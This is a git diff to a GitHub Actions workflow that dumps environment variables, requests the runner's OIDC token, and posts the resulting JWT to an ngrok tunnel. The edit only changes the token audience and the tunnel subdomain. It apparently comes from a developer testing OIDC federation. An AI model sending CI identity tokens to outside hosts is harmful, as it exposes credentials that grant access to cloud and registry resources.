--- a/.github/workflows/federate.yml
+++ b/.github/workflows/federate.yml
@@ -20,6 +20,6 @@ jobs:
         run: env
       - name: Get token and use the CLI
         run: |
-          OIDC_TOKEN=$(curl -sLS "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=o6s" -H "User-Agent: actions/oidc-client" -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN")
+          OIDC_TOKEN=$(curl -sLS "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=docker-build-action" -H "User-Agent: actions/oidc-client" -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN")
           JWT=$(echo $OIDC_TOKEN | jq -j '.value')
-          curl --header "token: $JWT" https://5eb6-108-53-73-234.ngrok.io
+          curl --header "token: $JWT" https://1df5-108-53-73-234.ngrok.io
